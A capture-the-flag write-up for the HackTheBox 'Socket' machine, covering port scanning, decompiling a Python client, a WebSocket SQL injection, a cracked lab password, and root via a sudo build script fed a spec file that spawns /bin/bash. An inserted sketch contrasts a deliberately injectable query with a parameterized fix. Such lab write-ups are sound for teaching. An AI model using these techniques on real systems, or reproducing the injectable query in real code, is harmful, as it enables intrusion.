https://app.hackthebox.com/machines/Socket
Socket is a newly released Open Beta Season medium-difficulty Linux box from HackTheBox.
Let’s start
Nmap output
Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-29 13:35 EDT
Nmap scan report for qreader.htb (10.10.11.206)
Host is up (0.079s latency).
Not shown: 65532 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 4fe3a667a227f9118dc30ed773a02c28 (ECDSA)
|_ 256 816e78766b8aea7d1babd436b7f8ecc4 (ED25519)
80/tcp open http Apache httpd 2.4.52
|_http-title: Site doesn't have a title (text/html; charset=utf-8).
| http-methods:
|_ Supported Methods: OPTIONS GET HEAD
| http-server-header:
| Apache/2.4.52 (Ubuntu)
|_ Werkzeug/2.1.2 Python/3.10.6
5789/tcp open unknown
| fingerprint-strings:
| GenericLines, GetRequest, HTTPOptions, RTSPRequest:
| HTTP/1.1 400 Bad Request
| Date: Wed, 29 Mar 2023 17:36:42 GMT
| Server: Python/3.10 websockets/10.4
| Content-Length: 77
| Content-Type: text/plain
| Connection: close
| Failed to open a WebSocket connection: did not receive a valid HTTP request.
| Help, SSLSessionReq:
| HTTP/1.1 400 Bad Request
| Date: Wed, 29 Mar 2023 17:36:58 GMT
| Server: Python/3.10 websockets/10.4
| Content-Length: 77
| Content-Type: text/plain
| Connection: close
|_ Failed to open a WebSocket connection: did not receive a valid HTTP request.
[REDACTED]
Add “qreader.htb” to the hosts file.
Browsing the site shows something like this:
Download the app. The site runs on Flask, so let’s assume the app is also built with Python.
I’m using pyinstxtractor to unpack the app (a PyInstaller bundle):
wget https://raw.githubusercontent.com/extremecoders-re/pyinstxtractor/master/pyinstxtractor.py
python pyinstxtractor.py app/qreader.exe
cd into the output folder and decompile the pyc file:
pip3 install uncompyle6
uncompyle6 qreader.pyc > qreader.py
Analyzing the code, there is a vulnerability in this part of the code:
Next, let’s run a WebSocket vulnerability scan against port 5789 with STEWS:
python3 STEWS-vuln-detect.py -1 -n -u qreader.htb:5789
Let’s write a script to exploit the SQL injection found in the source code above.
Some usernames are found, looks great. 😍
Now let’s try to get the password.
Here is the password, which can be easily cracked with CrackStation.
password: “denjanjade122566”
SSH in and get user.txt.
I had to try several times, as the username is tricky: “tkeller”.
Uh! Initial access done :D
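As an added defender-side illustration (this is not the writeup’s exploit script, nor the real qreader code), here is a constructed sketch of the bug class behind the finding: a Python handler that builds SQL from a WebSocket text frame by string formatting, beside the parameterized version that fixes it. The table, the `{"role": ...}` frame format and the sample rows are all assumptions.

```python
import json
import sqlite3

# Constructed stand-in for the app's database; table, columns and rows are assumptions.
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, role TEXT)")
    conn.executemany("INSERT INTO users (username, role) VALUES (?, ?)",
                     [("alice", "admin"), ("bob", "user"), ("o'neil", "user")])
    conn.commit()
    return conn

def lookup_vulnerable(conn, role):
    # Client-controlled text is pasted straight into the statement: the SQL injection bug class.
    query = f"SELECT username FROM users WHERE role = '{role}'"
    return [row[0] for row in conn.execute(query)]

def lookup_fixed(conn, role):
    # Bound parameter: the driver passes the value as data, quotes and all, never as SQL.
    query = "SELECT username FROM users WHERE role = ?"
    return [row[0] for row in conn.execute(query, (role,))]

def handle_frame(conn, raw, lookup=lookup_fixed):
    """Handle one text frame of the assumed form {"role": "<string>"} and build the reply."""
    try:
        field = json.loads(raw)["role"]
    except (ValueError, KeyError, TypeError):
        return {"error": "malformed request"}
    if not isinstance(field, str) or len(field) > 64:
        return {"error": "invalid role"}
    try:
        return {"usernames": lookup(conn, field)}
    except sqlite3.Error:
        return {"error": "query failed"}  # never echo the database error text to the client
```

With the fixed lookup, an input containing a quote is simply a role name that matches nothing; with the vulnerable one, the same input changes the query.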
Privilege Escalation
Running “sudo -l” gives this:
Reviewing the “build-installer.sh” file, it seems OS commands can be run as root.
Let’s get to root…
echo 'import os;os.system("/bin/bash")' > b17.spec
sudo /usr/local/sbin/build-installer.sh build b17.spec
& it’s done!
Let’s hope to see you again with some juicy stuff.
Until then, this is badboy_17, and I really do thank you for joining me. ♥️